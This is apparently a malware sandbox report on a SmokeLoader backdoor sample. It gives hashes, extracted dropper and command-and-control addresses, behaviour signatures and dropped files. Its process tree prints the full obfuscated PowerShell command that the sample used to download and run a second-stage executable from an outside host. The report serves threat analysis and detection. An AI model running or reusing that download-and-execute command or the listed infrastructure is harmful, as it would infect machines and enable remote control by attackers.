Overview

overview

10

Static

static

2c2cb2aa07...79.exe

windows7_x64

10

2c2cb2aa07...79.exe

windows10_x64

10

Analysis

  • max time kernel
    19s
  • max time network
    20s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    13-04-2021 13:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2c2cb2aa0782874d3c14cdd6f063f979.exe

  • Size

    847KB

  • MD5

    2c2cb2aa0782874d3c14cdd6f063f979

  • SHA1

    583c43ca939f9d8a4eea53a7d71157ac3571a350

  • SHA256

    c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da

  • SHA512

    34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26

Score
10/10
smokeloaderbackdoortrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://u.teknik.io/bHrgG.jpg

Extracted

Family

smokeloader

Version

2018

C2

http://94.140.114.59/1/

rc4.i32
rc4.i32

Signatures

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2c2cb2aa0782874d3c14cdd6f063f979.exe
    "C:\Users\Admin\AppData\Local\Temp\2c2cb2aa0782874d3c14cdd6f063f979.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:980
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2000
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:772
        • C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
          "C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"
          4⤵
          • Executes dropped EXE
          • Maps connected drives based on registry
          • Suspicious behavior: MapViewOfSection
          PID:1912

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
    MD5

    3cf58ec9de521b32015552ca3024d1cd

    SHA1

    539236ecd9d859f82f89311bfd564906aa98451e

    SHA256

    ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

    SHA512

    25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    f85c15f58e8448b7b946598629fc786f

    SHA1

    8308857badcfda97cb8ab908ac686a65857739d8

    SHA256

    1bb7837ddd42d31f157ea4310655dfa3c424398ae2da228edf60f1faa8a1fac3

    SHA512

    1039ae1c6b39c6b14ab4ccb75244a7ddf2a8fd8316e1181003a795714e2c72bc30c9719c77c3688d77dbeb35079eaf3020c6a292286ddd0399636d3087b8215f

    Download Submit
  • \Users\Admin\AppData\Local\Temp\nTvWNOa.exe
    MD5

    3cf58ec9de521b32015552ca3024d1cd

    SHA1

    539236ecd9d859f82f89311bfd564906aa98451e

    SHA256

    ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

    SHA512

    25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

    Download Submit
  • \Users\Admin\AppData\Local\Temp\nTvWNOa.exe
    MD5

    3cf58ec9de521b32015552ca3024d1cd

    SHA1

    539236ecd9d859f82f89311bfd564906aa98451e

    SHA256

    ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

    SHA512

    25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

    Download Submit
  • memory/772-93-0x00000000062C0000-0x00000000062C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/772-85-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/772-94-0x0000000006380000-0x0000000006381000-memory.dmp
    Filesize

    4KB

    Download
  • memory/772-68-0x0000000000000000-mapping.dmp
    Download
  • memory/772-86-0x00000000062F0000-0x00000000062F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/772-73-0x0000000004860000-0x0000000004861000-memory.dmp
    Filesize

    4KB

    Download
  • memory/772-74-0x0000000004862000-0x0000000004863000-memory.dmp
    Filesize

    4KB

    Download
  • memory/772-79-0x0000000005740000-0x0000000005741000-memory.dmp
    Filesize

    4KB

    Download
  • memory/772-84-0x00000000057F0000-0x00000000057F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/980-59-0x0000000075FF1000-0x0000000075FF3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1200-100-0x00000000029E0000-0x00000000029E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1200-101-0x00000000029C0000-0x00000000029D5000-memory.dmp
    Filesize

    84KB

    Download
  • memory/1912-97-0x0000000000000000-mapping.dmp
    Download
  • memory/2000-66-0x0000000002540000-0x0000000002541000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2000-64-0x0000000001DB0000-0x00000000029FA000-memory.dmp
    Filesize

    12.3MB

    Download
  • memory/2000-67-0x0000000005240000-0x0000000005241000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2000-63-0x0000000004840000-0x0000000004841000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2000-62-0x00000000020D0000-0x00000000020D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2000-60-0x0000000000000000-mapping.dmp
    Download